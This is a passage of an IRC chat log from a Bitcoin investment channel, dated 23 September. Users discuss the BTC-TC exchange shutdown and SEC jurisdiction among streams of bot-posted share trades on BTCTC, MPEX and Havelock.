17:47:08 US lawyers or outside of the US? Sep 23 17:47:18 why is MPOE still running if the others have to shut down????? Sep 23 17:47:24 I'd of bought the exchange from him :D Sep 23 17:47:27 [BTCTC] [ASICMINER-PT] 6 @ 1.3035 = 7.821 BTC [-] {2} Sep 23 17:47:27 [BTCTC] [FN] [BTC-GROWTH] 7 @ 0.081 = 0.567 BTC [+] Sep 23 17:47:42 Would you of rented it out to outsiders? :P Sep 23 17:47:59 because MPOE is a honeypot for the NSA Sep 23 17:48:08 and SEC Sep 23 17:48:11 :troll: Sep 23 17:48:28 [BTCTC] [FN] [BTC-GROWTH] 62 @ 0.08728532 = 5.4117 BTC [+] {5} Sep 23 17:48:28 [BTCTC] [ASICMINER-PT] 10 @ 1.29729999 = 12.973 BTC [-] {6} Sep 23 17:48:33 I'm sure the SEC has paid plenty of attention to it Sep 23 17:48:36 well thats good. someone else can open another exchange Sep 23 17:48:44 www.bitfunder.com Sep 23 17:49:16 wonder if it could handle the traffic Sep 23 17:49:29 [BTCTC] [ASICMINER-PT] 2 @ 1.281 = 2.562 BTC [-] Sep 23 17:49:51 fractal you trolling right? Sep 23 17:50:20 i wonder too. with ukyo focusing on legal issues instead of the site Sep 23 17:50:26 what? Sep 23 17:50:30 [BTCTC] [ASICMINER-PT] 1 @ 1.281 BTC [-] Sep 23 17:50:42 mpex is forever Sep 23 17:50:52 if the site is outside the US and the owner isn't american, i fail to see what jurisdiction the SEC has.. Sep 23 17:51:10 Because Sep 23 17:51:13 In this case ,the owner is american Sep 23 17:51:14 fractal: "American investors" Sep 23 17:51:23 No nation is going to pick a fight with the SEC Sep 23 17:51:29 over something as treivial as a btc exchange Sep 23 17:51:31 [BTCTC] [ASICMINER-PT] 18 @ 1.27394444 = 22.931 BTC [-] {3} Sep 23 17:51:36 trivial* Sep 23 17:51:51 sealand might Sep 23 17:51:52 matuszed: pretty sure if you host it in venezula, or a non-aligned country, they wont give 2 fucks Sep 23 17:51:55 if you as an american invest anywhere, the SEC is here to protect you Sep 23 17:52:02 Correct Sep 23 17:52:23 SEC has ZERO pull in non-algined countries.... host in russia or venezuala, or iran Sep 23 17:52:29 http://pitchfork.com/advance/232-deltron-3030-event-ii/ Sep 23 17:52:31 Deltron 3030: Deltron 3030: Event II | Advance | Pitchfork Sep 23 17:52:32 [BTCTC] [CIPHERMINE-PT] 11 @ 0.0272 = 0.2992 BTC [+] Sep 23 17:52:32 [BTCTC] [BITVPS] 126 @ 0.001001 = 0.1261 BTC [+] Sep 23 17:52:33 [BTCTC] [FN] [BTC-GROWTH] 99 @ 0.07352 = 7.2785 BTC [-] Sep 23 17:52:38 yw Sep 23 17:52:39 Does the SEC have any pull outside of the US/ Sep 23 17:52:41 deltron is in philly next month Sep 23 17:52:45 xcite Sep 23 17:52:47 I didn't think they even had much of a pull with TSX Sep 23 17:52:51 nice zionky Sep 23 17:53:12 the20year1: only with countries that have strong US ties...... thats why i say host the site in a country with weak US ties and the SEC wont have jurisdiction imo Sep 23 17:53:32 That helps but its not going to save you Sep 23 17:53:33 [BTCTC] [FN] [BTC-GROWTH] 37 @ 0.07352 = 2.7202 BTC [-] Sep 23 17:53:34 [BTCTC] [ASICMINER-PT] 7 @ 1.29171427 = 9.042 BTC [+] {4} Sep 23 17:53:34 [MPEX] [S.MPOE] 5800 @ 0.0009214 = 5.3441 BTC [-] Sep 23 17:54:22 you'll have to forever avoid travelling to the US Sep 23 17:55:01 to not end up like dmitry sklyarov Sep 23 17:55:01 i accepted that Sep 23 17:55:36 [BTCTC] [LABCOIN] 115 @ 0.001249 = 0.1436 BTC [+] {2} Sep 23 17:55:36 [BTCTC] [BTC-TRADING-PT] 5 @ 0.05001 = 0.2501 BTC [+] Sep 23 17:56:36 [BTCTC] [BTC-TRADING-PT] 19 @ 0.04613157 = 0.8765 BTC [-] {3} Sep 23 17:56:36 [BTCTC] [ACTIVEMINING] 219 @ 0.001519 = 0.3327 BTC [-] Sep 23 17:57:25 this reminds me of nefario Sep 23 17:57:34 talking about btc to border officers Sep 23 17:57:37 [BTCTC] [ACTIVEMINING] 348 @ 0.00151515 = 0.5273 BTC [-] {3} Sep 23 17:57:50 how he has a guy who will exchange this btc for cash in the city Sep 23 17:57:54 lmao Sep 23 17:58:38 [BTCTC] [ASICMINER-PT] 1 @ 1.294 BTC [+] Sep 23 17:59:04 lol he did what? Sep 23 17:59:13 i must have forgoten Sep 23 17:59:15 http://www.digitaltrends.com/computing/bitcoin-developer-halted-at-us-customs-for-lack-of-real-cash/ Sep 23 17:59:17 Bitcoin developer halted at US Customs for lack of real cash | Digital Trends Sep 23 17:59:25 http://blog.glbse.com/no-electronic-devices Sep 23 17:59:26 its down Sep 23 17:59:39 [MPEX] [S.MPOE] 1850 @ 0.00092205 = 1.7058 BTC [+] Sep 23 17:59:39 [BTCTC] [DMS.MINING] 476 @ 0.00135 = 0.6426 BTC [-] Sep 23 18:00:40 [HAVELOCK] [AM100] 23 @ 0.01515065 = 0.3485 BTC [-] {2} Sep 23 18:01:41 [BTCTC] [ASICMINER-PT] 1 @ 1.296 BTC [+] Sep 23 18:02:04 ahaha Sep 23 18:02:08 <3 IA Sep 23 18:02:09 http://web.archive.org/web/20130527033731/http://blog.glbse.com/no-electronic-devices Sep 23 18:02:11 jurov ^^ Sep 23 18:02:13 No Electronic devices - GLBSE Sep 23 18:02:42 [BTCTC] [ASICMINER-PT] 3 @ 1.31366666 = 3.941 BTC [+] {3} Sep 23 18:02:43 http://www.reddit.com/r/Bitcoin/comments/1my393/btctc_website_shutdown_announcement/ccdq78w Sep 23 18:02:45 gox comments on BTC-TC Website Shutdown Announcement Sep 23 18:02:49 the mighty gox weighs in Sep 23 18:03:40 at that point i knew the dude was retarded really Sep 23 18:03:43 [BTCTC] [ASICMINER-PT] 2 @ 1.296 = 2.592 BTC [-] {2} Sep 23 18:04:44 [BTCTC] [ASICMINER-PT] 1 @ 1.34 BTC [+] Sep 23 18:05:45 [BTCTC] [DMS.MINING] 2529 @ 0.00135 = 3.4142 BTC [-] {2} Sep 23 18:05:45 [BTCTC] [FN] [DMS.SELLING] 502 @ 0.0055 = 2.761 BTC [+] Sep 23 18:05:54 "Finally don't lie, they will find out, and they are likely to ban you for life from entering the U.S. ever again." oh nefario Sep 23 18:05:56 uhhhhhhhhhhhhhhhhhhhhh Sep 23 18:06:02 what the f Sep 23 18:06:09 TorBroker still exists? Sep 23 18:06:14 arij, should have stayed on mpex Sep 23 18:06:17 has anyone been using that?.. Sep 23 18:06:18 is this real life Sep 23 18:06:27 we got delisted from mpex Sep 23 18:06:27 haha Sep 23 18:06:38 :D Sep 23 18:06:46 [BTCTC] [COGNITIVE] 5 @ 0.12038 = 0.6019 BTC [+] {3} Sep 23 18:06:46 [BTCTC] [ACTIVEMINING] 250 @ 0.00151891 = 0.3797 BTC [+] {3} Sep 23 18:06:46 [BTCTC] [ASICMINER-PT] 1 @ 1.338 BTC [-] Sep 23 18:06:58 well there goes that Sep 23 18:07:00 that'd be mp Sep 23 18:07:09 this is so fun, unlike business, or just like, im not sure! Sep 23 18:07:14 jeeze where is namworld when you need him Sep 23 18:07:46 no you didn't want to be on mpex in first place.. don't bs us Sep 23 18:07:47 Sleeping. Sep 23 18:07:47 [BTCTC] [DMS.MINING] 651 @ 0.001301 = 0.847 BTC [-] Sep 23 18:07:47 [BTCTC] [LABCOIN] 195 @ 0.001197 = 0.2334 BTC [-] Sep 23 18:07:47 [BTCTC] [ASICMINER-PT] 1 @ 1.339 BTC [+] Sep 23 18:07:55 namworls flees to caymans with books Sep 23 18:08:34 i didnt want to be anywhere.. we just did it to not screw people over that invested from the rg era Sep 23 18:08:52 well anyways... bitvps is still running and more work to do. ill get back to that Sep 23 18:09:10 arij is the man Sep 23 18:09:28 no scrat is the man Sep 23 18:09:49 [BTCTC] [ASICMINER-PT] 2 @ 1.3 = 2.6 BTC [-] {2} Sep 23 18:10:50 [BTCTC] [ASICMINER-PT] 2 @ 1.299 = 2.598 BTC [-] {2} Sep 23 18:10:50 [BTCTC] [LABCOIN] 202 @ 0.001193 = 0.241 BTC [-] {2} Sep 23 18:13:54 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [-] Sep 23 18:14:54 [BTCTC] [ACTIVEMINING] 100 @ 0.00151814 = 0.1518 BTC [-] {2} Sep 23 18:14:54 [BTCTC] [B.YABMC] 1103 @ 0.000112 = 0.1235 BTC [+] Sep 23 18:14:54 [BTCTC] [BITVPS] 250 @ 0.001001 = 0.2503 BTC [+] Sep 23 18:15:55 [BTCTC] [BITVPS] 164 @ 0.001 = 0.164 BTC [-] {2} Sep 23 18:15:55 [BTCTC] [ASICMINER-PT] 4 @ 1.3 = 5.2 BTC [+] Sep 23 18:15:55 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.07353 = 0.7353 BTC [+] Sep 23 18:16:57 [BTCTC] [FN] [DMS.SELLING] 166 @ 0.0052 = 0.8632 BTC [+] Sep 23 18:16:57 [BTCTC] [PAJKA.BOND] 35 @ 0.0032 = 0.112 BTC [-] Sep 23 18:17:57 [BTCTC] [ASICMINER-PT] 2 @ 1.31 = 2.62 BTC [+] Sep 23 18:18:58 [BTCTC] [LABCOIN] 3000 @ 0.00129639 = 3.8892 BTC [+] {6} Sep 23 18:18:59 [BTCTC] [ASICMINER-PT] 1 @ 1.311 BTC [+] Sep 23 18:19:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.181 BTC [-] Sep 23 18:20:00 [BTCTC] [LABCOIN] 1334 @ 0.00126923 = 1.6932 BTC [-] {8} Sep 23 18:20:00 [BTCTC] [ASICMINER-PT] 4 @ 1.339 = 5.356 BTC [+] {4} Sep 23 18:20:01 [BTCTC] [FN] [BTC-GROWTH] 66 @ 0.07354 = 4.8536 BTC [+] Sep 23 18:20:02 [BTCTC] [BTC-BOND] 538 @ 0.00900706 = 4.8458 BTC [+] {2} Sep 23 18:21:02 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1735 = 0.347 BTC [+] Sep 23 18:22:02 [BTCTC] [LABCOIN] 1467 @ 0.00121341 = 1.7801 BTC [-] {4} Sep 23 18:22:02 [BTCTC] [BTC-BOND] 1000 @ 0.009 = 9 BTC [-] Sep 23 18:22:03 fwiw i still had funds there and was able to withdraw them Sep 23 18:23:03 [BTCTC] [ASICMINER-PT] 10 @ 1.39169999 = 13.917 BTC [+] {5} Sep 23 18:23:03 [BTCTC] [COGNITIVE] 6 @ 0.1203 = 0.7218 BTC [-] Sep 23 18:24:04 [HAVELOCK] [HIM] 1 @ 0.12750042 BTC [-] Sep 23 18:25:05 [BTCTC] [FN] [DMS.SELLING] 135 @ 0.0052 = 0.702 BTC [+] {2} Sep 23 18:26:06 [BTCTC] [BTC-BOND] 710 @ 0.009 = 6.39 BTC [-] Sep 23 18:26:06 [BTCTC] [LABCOIN] 2000 @ 0.00128 = 2.56 BTC [-] {2} Sep 23 18:27:06 [BTCTC] [ASICMINER-PT] 1 @ 1.317 BTC [-] Sep 23 18:27:06 [MPEX] [S.MPOE] 9055 @ 0.00092511 = 8.3769 BTC [+] {3} Sep 23 18:27:06 [BTCTC] [LABCOIN] 350 @ 0.00128 = 0.448 BTC [-] Sep 23 18:28:27 jcpham: manual withdrawal? Sep 23 18:28:50 it was under the 2.4 or whatever Sep 23 18:28:59 so it happened immediately Sep 23 18:29:03 ah k Sep 23 18:29:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18 BTC [-] Sep 23 18:29:08 [BTCTC] [B] [CIPHERMINE.B1] 500 @ 0.00990115 = 4.9506 BTC [+] {4} Sep 23 18:29:19 1.9 and some change Sep 23 18:30:09 [BTCTC] [B] [CIPHERMINE.B1] 105 @ 0.01 = 1.05 BTC [+] {2} Sep 23 18:30:09 [BTCTC] [LABCOIN] 3800 @ 0.00129967 = 4.9387 BTC [+] {6} Sep 23 18:31:10 [BTCTC] [LABCOIN] 150 @ 0.00128 = 0.192 BTC [-] Sep 23 18:31:10 [BTCTC] [ASICMINER-PT] 2 @ 1.391 = 2.782 BTC [+] {2} Sep 23 18:32:11 [BTCTC] [ASICMINER-PT] 1 @ 1.391 BTC [+] Sep 23 18:32:11 [BTCTC] [LABCOIN] 753 @ 0.0013 = 0.9789 BTC [+] {2} Sep 23 18:33:12 [BTCTC] [ASICMINER-PT] 25 @ 1.32163999 = 33.041 BTC [-] {9} Sep 23 18:33:12 [BTCTC] [LABCOIN] 82 @ 0.00132 = 0.1082 BTC [+] Sep 23 18:34:13 [BTCTC] [ASICMINER-PT] 4 @ 1.31025 = 5.241 BTC [-] {2} Sep 23 18:34:13 [BTCTC] [LABCOIN] 473 @ 0.0013 = 0.6149 BTC [-] Sep 23 18:34:13 [BTCTC] [ACTIVEMINING] 99 @ 0.001542 = 0.1527 BTC [+] {2} Sep 23 18:35:14 [BTCTC] [LABCOIN] 774 @ 0.0013 = 1.0062 BTC [-] {2} Sep 23 18:35:15 [BTCTC] [ASICMINER-PT] 8 @ 1.311 = 10.488 BTC [+] {3} Sep 23 18:36:15 [BTCTC] [BASIC-MINING] 16 @ 0.07013749 = 1.1222 BTC [-] {5} Sep 23 18:37:16 [BTCTC] [BASIC-MINING] 2 @ 0.07014 = 0.1403 BTC [+] Sep 23 18:37:49 Haven't seen Basic go below .1 in quite a while Sep 23 18:39:18 [BTCTC] [FN] [DMS.SELLING] 323 @ 0.00596556 = 1.9269 BTC [+] {4} Sep 23 18:39:18 [BTCTC] [LABCOIN] 2225 @ 0.00132076 = 2.9387 BTC [+] {4} Sep 23 18:41:21 [BTCTC] [ASICMINER-PT] 2 @ 1.39 = 2.78 BTC [+] Sep 23 18:42:22 [BTCTC] [LABCOIN] 2373 @ 0.00133 = 3.1561 BTC [+] {2} Sep 23 18:43:23 [BTCTC] [CRYPTO-TRADE] 5 @ 0.18 = 0.9 BTC [-] Sep 23 18:43:23 [HAVELOCK] [HIM] 3 @ 0.17899999 = 0.537 BTC [+] Sep 23 18:43:24 [BTCTC] [ASICMINER-PT] 1 @ 1.391 BTC [+] Sep 23 18:44:26 [BTCTC] [LABCOIN] 2527 @ 0.00133 = 3.3609 BTC [+] {2} Sep 23 18:46:26 [BTCTC] [ACTIVEMINING] 113 @ 0.001595 = 0.1802 BTC [+] Sep 23 18:47:27 [BTCTC] [ACTIVEMINING] 662 @ 0.00158882 = 1.0518 BTC [-] {2} Sep 23 18:48:28 [BTCTC] [KENILWORTH] 1540 @ 0.000999 = 1.5385 BTC [+] Sep 23 18:48:28 [BTCTC] [LABCOIN] 2500 @ 0.00133514 = 3.3379 BTC [+] {2} Sep 23 18:48:28 [BTCTC] [ACTIVEMINING] 951 @ 0.00158727 = 1.5095 BTC [-] {4} Sep 23 18:48:29 [BTCTC] [ASICMINER-PT] 1 @ 1.318 BTC [-] Sep 23 18:49:29 [BTCTC] [ACTIVEMINING] 2184 @ 0.00156 = 3.407 BTC [-] Sep 23 18:49:29 [BTCTC] [LABCOIN] 320 @ 0.001259 = 0.4029 BTC [-] Sep 23 18:50:30 [BTCTC] [ASICMINER-PT] 1 @ 1.316 BTC [-] Sep 23 18:51:31 [BTCTC] [ASICMINER-PT] 3 @ 1.319 = 3.957 BTC [+] {2} Sep 23 18:51:31 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.07358 = 0.7358 BTC [+] {2} Sep 23 18:52:32 [BTCTC] [BASIC-MINING] 10 @ 0.07501 = 0.7501 BTC [+] Sep 23 18:52:32 [BTCTC] [ASICMINER-PT] 3 @ 1.31766666 = 3.953 BTC [-] {2} Sep 23 18:53:33 [BTCTC] [BASIC-MINING] 19 @ 0.075 = 1.425 BTC [-] Sep 23 18:53:33 [BTCTC] [ASICMINER-PT] 7 @ 1.316 = 9.212 BTC [-] {3} Sep 23 18:53:58 Black Monday? Sep 23 18:54:33 [BTCTC] [LABCOIN] 200 @ 0.001258 = 0.2516 BTC [-] Sep 23 18:54:33 [BTCTC] [ASICMINER-PT] 2 @ 1.32 = 2.64 BTC [+] Sep 23 18:57:31 THERE WILL BE BLOOD RESOLVES NO Sep 23 18:57:38 Hahahahahahahahahahahahahaha Sep 23 18:57:55 wtf Sep 23 18:57:59 err Sep 23 18:58:00 yes* Sep 23 18:58:02 MY BAD Sep 23 18:58:08 http://bitbet.us/ Sep 23 18:58:37 [BTCTC] [BTC-TRADING-PT] 16 @ 0.07000375 = 1.1201 BTC [+] {2} Sep 23 18:58:37 why is it even open Sep 23 18:58:37 [BTCTC] [ACTIVEMINING] 1688 @ 0.00150295 = 2.537 BTC [-] {7} Sep 23 18:58:37 [BTCTC] [LABCOIN] 1433 @ 0.00133685 = 1.9157 BTC [+] {3} Sep 23 18:58:52 I hope the last bets will be "refund" Sep 23 18:59:38 [BTCTC] [LABCOIN] 10567 @ 0.0013939 = 14.7293 BTC [+] {7} Sep 23 18:59:38 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18 BTC [-] Sep 23 19:00:12 85 btc bet Sep 23 19:00:39 [BTCTC] [LABCOIN] 2169 @ 0.0014 = 3.0366 BTC [+] {2} Sep 23 19:00:39 [BTCTC] [BASIC-MINING] 50 @ 0.08650398 = 4.3252 BTC [+] {5} Sep 23 19:00:39 [BTCTC] [BTC-TRADING-PT] 20 @ 0.04011 = 0.8022 BTC [-] Sep 23 19:00:40 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [+] Sep 23 19:01:40 [MPEX] [S.MPOE] 9162 @ 0.00092998 = 8.5205 BTC [+] {2} Sep 23 19:01:40 [BTCTC] [LABCOIN] 9038 @ 0.00147575 = 13.3378 BTC [+] {7} Sep 23 19:01:40 [BTCTC] [BTC-TRADING-PT] 20 @ 0.04011 = 0.8022 BTC [-] {2} Sep 23 19:01:42 pankkake you from de perhaps? Sep 23 19:01:48 .fr Sep 23 19:01:49 why? Sep 23 19:01:56 a ok nvm Sep 23 19:01:59 Paris ? Sep 23 19:02:01 yes Sep 23 19:02:32 Bitcoin-central still behind schedule... Sep 23 19:02:41 [BTCTC] [LABCOIN] 1001 @ 0.001401 = 1.4024 BTC [-] {2} Sep 23 19:02:41 [BTCTC] [BTC-TRADING-PT] 20 @ 0.0401 = 0.802 BTC [-] {2} Sep 23 19:03:42 [BTCTC] [ASICMINER-PT] 2 @ 1.375 = 2.75 BTC [+] Sep 23 19:04:43 [BTCTC] [LABCOIN] 100 @ 0.00135264 = 0.1353 BTC [-] {2} Sep 23 19:06:45 [BTCTC] [ASICMINER-PT] 2 @ 1.35 = 2.7 BTC [-] Sep 23 19:07:10 Hmm BTCTshutting down ? http://thegenesisblock.com/btc-trading-corp-shutters-operations-cites-regulatory-environment/ Sep 23 19:07:46 [BTCTC] [BTC-TRADING-PT] 44 @ 0.12422727 = 5.466 BTC [+] {2} Sep 23 19:07:47 [BTCTC] [COGNITIVE] 9 @ 0.1212 = 1.0908 BTC [+] Sep 23 19:08:24 holy fuck lol Sep 23 19:08:47 [BTCTC] [BTC-TRADING-PT] 1 @ 0.125 BTC [+] Sep 23 19:09:07 MY BAD Sep 23 19:09:48 [BTCTC] [BTC-TRADING-PT] 2 @ 0.125 = 0.25 BTC [+] Sep 23 19:11:30 ;;clac (6.9 + 10 + 10 + 10) / 40 Sep 23 19:11:30 Error: "clac" is not a valid command. Sep 23 19:11:34 ;;calc (6.9 + 10 + 10 + 10) / 40 Sep 23 19:11:34 0.9225 Sep 23 19:11:50 ;;calc (6.9 + 9 + 9 + 9) / 40 Sep 23 19:11:51 [BTCTC] [LABCOIN] 500 @ 0.00144733 = 0.7237 BTC [+] {2} Sep 23 19:11:51 0.8475 Sep 23 19:12:52 [BTCTC] [LABCOIN] 190 @ 0.001448 = 0.2751 BTC [+] Sep 23 19:13:52 [BTCTC] [LABCOIN] 4732 @ 0.00142062 = 6.7224 BTC [-] {7} Sep 23 19:13:53 [BTCTC] [BTC-TRADING-PT] 8 @ 0.125 = 1 BTC [+] Sep 23 19:14:54 [BTCTC] [LABCOIN] 3000 @ 0.0014064 = 4.2192 BTC [-] {5} Sep 23 19:15:33 !ticker m s.mpoe Sep 23 19:15:34 [MPEX:S.MPOE] 1D: 0.0009214 / 0.00092642 / 0.00093096 (295705 shares, 273.95 BTC), 7D: 0.00090249 / 0.00092295 / 0.00094307 (1287914 shares, 1,188.68 BTC), 30D: 0.00081 / 0.00088512 / 0.00094307 (8728722 shares, 7,726.03 BTC) Sep 23 19:15:41 :D Sep 23 19:16:56 [MPEX] [S.MPOE] 5800 @ 0.00093066 = 5.3978 BTC [+] {3} Sep 23 19:16:56 [BTCTC] [COGNITIVE] 10 @ 0.1212 = 1.212 BTC [+] Sep 23 19:17:57 [BTCTC] [BTC-BOND] 613 @ 0.00800001 = 4.904 BTC [-] {2} Sep 23 19:19:23 wow, thank you Deprived for divesting Sep 23 19:19:53 I'm almost back on JD Sep 23 19:19:59 [BTCTC] [LABCOIN] 5000 @ 0.00144473 = 7.2237 BTC [+] {5} Sep 23 19:19:59 [MPEX] [S.MPOE] 25000 @ 0.00091591 = 22.8978 BTC [-] {5} Sep 23 19:21:00 [BTCTC] [LABCOIN] 3503 @ 0.00143719 = 5.0345 BTC [-] {3} Sep 23 19:21:59 pankkake: JD? Sep 23 19:22:00 [MPEX] [S.BBET] 8500 @ 0.00055 = 4.675 BTC [-] Sep 23 19:22:00 [MPEX] [S.MG] 5000 @ 0.00018 = 0.9 BTC [-] {2} Sep 23 19:22:04 Just-Dice Sep 23 19:22:09 oh Sep 23 19:24:02 [BTCTC] [LABCOIN] 4496 @ 0.00144992 = 6.5188 BTC [+] {4} Sep 23 19:24:02 [HAVELOCK] [VTX] 1 @ 0.5499 BTC [+] Sep 23 19:25:03 [BTCTC] [LABCOIN] 147 @ 0.001501 = 0.2206 BTC [+] Sep 23 19:27:14 ;;ticker Sep 23 19:27:14 MtGox BTCUSD ticker | Best bid: 134.00001, Best ask: 134.09900, Bid-ask spread: 0.09899, Last trade: 134.00000, 24 hour volume: 4190.97378274, 24 hour low: 132.00000, 24 hour high: 135.00000, 24 hour vwap: 133.44938 Sep 23 19:28:06 [BTCTC] [LABCOIN] 400 @ 0.001499 = 0.5996 BTC [-] Sep 23 19:28:07 [BTCTC] [FN] [DMS.SELLING] 505 @ 0.0061 = 3.0805 BTC [+] {2} Sep 23 19:29:07 [BTCTC] [FN] [DMS.SELLING] 294 @ 0.00594714 = 1.7485 BTC [-] {2} Sep 23 19:30:10 [BTCTC] [ASICMINER-PT] 10 @ 1.382 = 13.82 BTC [+] {2} Sep 23 19:30:10 [BTCTC] [LABCOIN] 167 @ 0.001498 = 0.2502 BTC [-] Sep 23 19:31:09 [BTCTC] [LABCOIN] 300 @ 0.001499 = 0.4497 BTC [+] Sep 23 19:31:10 [BTCTC] [ASICMINER-PT] 5 @ 1.383 = 6.915 BTC [+] Sep 23 19:32:11 [BTCTC] [ASICMINER-PT] 10 @ 1.3845 = 13.845 BTC [+] {2} Sep 23 19:32:11 [BTCTC] [LABCOIN] 501 @ 0.0014986 = 0.7508 BTC [-] {2} Sep 23 19:33:11 [BTCTC] [ASICMINER-PT] 6 @ 1.398 = 8.388 BTC [+] Sep 23 19:35:14 [BTCTC] [LABCOIN] 300 @ 0.001498 = 0.4494 BTC [-] {2} Sep 23 19:38:17 [HAVELOCK] [SDSTM] 63 @ 0.00250472 = 0.1578 BTC [-] {4} Sep 23 19:40:19 [BTCTC] [FN] [DMS.SELLING] 18 @ 0.005931 = 0.1068 BTC [-] Sep 23 19:41:06 >I know what I have done is inexcusable, but please understand the circumstances. I wanted my company to have more money. At the time of doing it, I justified it to myself by saying it was in the best interest of the company. But it really didn't turn out that way did it... I've learnt my lesson and won't be doing that again, that's for sure. Sep 23 19:41:20 anyone wanna guess who said that Sep 23 19:41:20 [BTCTC] [LABCOIN] 4001 @ 0.00135995 = 5.4412 BTC [-] {12} Sep 23 19:41:52 Garr? Sep 23 19:41:58 damn too easy. Sep 23 19:42:00 hehe Sep 23 19:42:21 [BTCTC] [DMS.MINING] 100 @ 0.00143005 = 0.143 BTC [-] {2} Sep 23 19:42:23 who is Garr? Sep 23 19:42:41 cognitive scammer Sep 23 19:43:22 [BTCTC] [RSM] 158 @ 0.004477 = 0.7074 BTC [+] Sep 23 19:43:22 [BTCTC] [ASICMINER-PT] 5 @ 1.3972 = 6.986 BTC [-] {2} Sep 23 19:43:38 it almost sounds cool with cognitive as an adjective Sep 23 19:44:23 [BTCTC] [RSM] 189 @ 0.00447998 = 0.8467 BTC [+] {2} Sep 23 19:44:23 [BTCTC] [ASICMINER-PT] 18 @ 1.40422222 = 25.276 BTC [+] {4} Sep 23 19:44:23 [BTCTC] [DMS.MINING] 9932 @ 0.00140293 = 13.9339 BTC [-] {4} Sep 23 19:44:27 hes a ratty-snake Sep 23 19:45:13 Hes fucking pissing me off these past few days Sep 23 19:45:19 also he blew inabas pack or whatever he has between his legs Sep 23 19:46:23 MilkLep are you chaangnoi or something? Sep 23 19:46:25 [HAVELOCK] [CBTC] 5000 @ 0.00036534 = 1.8267 BTC [-] {5} Sep 23 19:46:26 [BTCTC] [LABCOIN] 456 @ 0.00131392 = 0.5991 BTC [-] {3} Sep 23 19:46:32 lol Sep 23 19:46:44 no, I can only imagine goat boy is livid though Sep 23 19:47:07 shill payments are late? Sep 23 19:47:26 [HAVELOCK] [CBTC] 2000 @ 0.00036501 = 0.73 BTC [-] {3} Sep 23 19:48:27 [BTCTC] [FN] [DMS.SELLING] 106 @ 0.00593009 = 0.6286 BTC [-] {2} Sep 23 19:48:27 [BTCTC] [CIPHERMINE-PT] 8 @ 0.022 = 0.176 BTC [-] Sep 23 19:48:27 [BTCTC] [ASICMINER-PT] 1 @ 1.37 BTC [-] Sep 23 19:48:56 fuck man, whats new, I knew my risks and I accept that, but the kid is putting his future and his companies future in jeopardy recently Sep 23 19:48:56 why is jgarzik out of the woodwork with telling everyone to make a decentralized exchange? Sep 23 19:49:04 that is what I didnt forsee Sep 23 19:49:20 you didnt foresee a kid crashing mom's car? Sep 23 19:49:57 I expected to jump out the window before hitting the tree Sep 23 19:50:03 lol Sep 23 19:50:29 [BTCTC] [BTC-TRADING-PT] 21 @ 0.1199 = 2.5179 BTC [+] {2} Sep 23 19:50:29 [BTCTC] [ASICMINER-PT] 2 @ 1.37 = 2.74 BTC [-] {2} Sep 23 19:50:29 [BTCTC] [COGNITIVE] 1 @ 0.1163 BTC [-] Sep 23 19:50:33 then you deserve to be played, its how it goes. Sep 23 19:50:44 maybe the next step is a TOR exchange, where everything is allowed Sep 23 19:50:44 (i.e. scams allowed) Sep 23 19:50:45 it would be part of the game Sep 23 19:50:52 [12:49] I expected to jump out the window before hitting the tree <<< fair enough! Sep 23 19:51:30 [BTCTC] [BTC-TRADING-PT] 23 @ 0.12 = 2.76 BTC [+] Sep 23 19:52:04 MilkyLep its change your 'invesment' strategy or run out of btc Sep 23 19:52:06 i wonder why anyone would buy shares in BTCT at this time Sep 23 19:52:22 lol kako please spare me Sep 23 19:52:31 [BTCTC] [BTC-TRADING-PT] 2 @ 0.12 = 0.24 BTC [+] Sep 23 19:52:31 [BTCTC] [LABCOIN] 4766 @ 0.00136783 = 6.5191 BTC [-] {2} Sep 23 19:52:32 [HAVELOCK] [CBTC] 3000 @ 0.00036501 = 1.095 BTC [-] {3} Sep 23 19:52:44 i will, but only cause im out of time, bbl Sep 23 19:52:59 I accept my losses and im dar from out or completely burned Sep 23 19:53:04 far* Sep 23 19:53:32 [BTCTC] [DMS.MINING] 210 @ 0.00135 = 0.2835 BTC [-] Sep 23 19:55:41 @ TAT Faith in issuers. Sep 23 19:56:11 i mean actual shares in the exchange Sep 23 19:56:15 [BTC-TRADING-PT] Sep 23 19:56:33 ahh "in" my bad Sep 23 19:56:35 [MPEX] [S.MPOE] 1259 @ 0.00091327 = 1.1498 BTC [-] Sep 23 19:56:49 Yea who knows Sep 23 19:57:19 those should go to zero… unless maybe there's a sale of the source code Sep 23 19:57:22 I never read the contract, I assume theres some buyback clause? Sep 23 19:57:36 [BTCTC] [BASIC-MINING] 2 @ 0.076 = 0.152 BTC [-] Sep 23 19:57:36 [HAVELOCK] [CBTC] 491 @ 0.00036501 = 0.1792 BTC [-] {4} Sep 23 19:57:37 [BTCTC] [LABCOIN] 10399 @ 0.00144996 = 15.0781 BTC [+] {3} Sep 23 19:57:42 doubtful Sep 23 19:57:45 Split of site trading fees over the next month? Sep 23 19:57:54 he edited most details out of the contract a while ago Sep 23 19:58:13 How convienent Sep 23 19:58:17 he'll just say lawyer fees ate up all the trade fees Sep 23 19:58:37 [BTCTC] [NASTY-PT] 757 @ 0.00062664 = 0.4744 BTC [-] {2} Sep 23 19:58:37 [BTCTC] [FN] [BTC-GROWTH] 34 @ 0.07505 = 2.5517 BTC [+] Sep 23 19:59:03 oh shit i should add [FC] Sep 23 19:59:27 No reason for a TOR exchange Sep 23 19:59:37 Just have everything located in Panama or Hong Kong Sep 23 19:59:38 [BTCTC] [PETA-MINE] 1 @ 0.601 BTC [+] Sep 23 19:59:38 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.07505 = 0.7505 BTC [+] Sep 23 19:59:38 [HAVELOCK] [AM100] 11 @ 0.0157 = 0.1727 BTC [+] Sep 23 19:59:48 so mircea_popescu penning the most epic trilema evar right now or what? Sep 23 19:59:53 everyone will be talking about colored coins and decentralized exchange ideas for weeks Sep 23 19:59:53 where the gloating Sep 23 19:59:59 i have my popcorn here Sep 23 20:00:37 pretty much as buttercoin was a thing after one mtgox issue or something Sep 23 20:00:38 the20year1: it's already in Belize Sep 23 20:00:39 [BTCTC] [LABCOIN] 200 @ 0.001495 = 0.299 BTC [+] Sep 23 20:00:39 [BTCTC] [FN] [BTC-GROWTH] 4 @ 0.07505 = 